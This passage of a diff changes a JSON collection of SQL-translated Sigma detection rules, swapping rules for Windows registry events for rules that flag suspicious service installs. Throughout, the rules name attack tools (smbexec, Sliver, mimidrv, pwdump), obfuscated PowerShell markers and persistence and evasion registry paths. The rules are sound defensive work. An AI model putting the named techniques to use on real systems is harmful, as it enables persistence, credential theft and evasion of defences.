'%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" - }, - { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", - "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "filename": "win_system_powershell_script_installed_as_service.yml" + }, + { + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "status": "test", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.lateral_movement", + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Office Application Startup - Office Test", - "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", - "author": "omkar72", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1137.002" + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_event_office_test_regadd.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_event_persistence_recycle_bin.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", + "title": "Remote Access Tool Services Have Been Installed - System", + "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", + "status": "experimental", + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1543.003", + "attack.t1569.002" ], - "level": "critical", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_service_install_remote_access_software.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", + "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", - "status": "test", - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "status": "experimental", + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "status": "experimental", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Removal Of SD Value to Hide Schedule Task - Registry", - "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "title": "New PDQDeploy Service - Client Side", + "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", "status": "experimental", - "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", - "author": "Sittikorn S", + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" ], - "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" + "filename": "win_system_service_install_pdqdeploy_runner.yml" }, { - "title": "Removal of Potential COM Hijacking Registry Keys", - "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", - "status": "test", - "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Anydesk Remote Access Software Service Installation", + "id": "530a6faa-ff3d-4022-b315-50828e77eef5", + "status": "experimental", + "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ - "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" + "Legitimate usage of the anydesk tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\') OR (NewProcessName LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" ], - "filename": "registry_delete_removal_com_hijacking_registry_key.yml" + "filename": "win_system_service_install_anydesk.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "title": "Tap Driver Installation", + "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unlikely" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_tap_driver_installation.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "status": "experimental", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Removal Of Index Value to Hide Schedule Task - Registry", - "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "title": "PAExec Service Installation", + "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", + "description": "Detects PAExec service installation", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" + "filename": "win_system_service_install_paexec.yml" }, { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", - "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "status": "experimental", - "description": "Detects COM object hijacking via TreatAs subkey", - "author": "Kutepov Anton, oscd.community", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Maybe some system utilities in rare cases use linking keys for backward compatibility" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_com_key_linking.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE 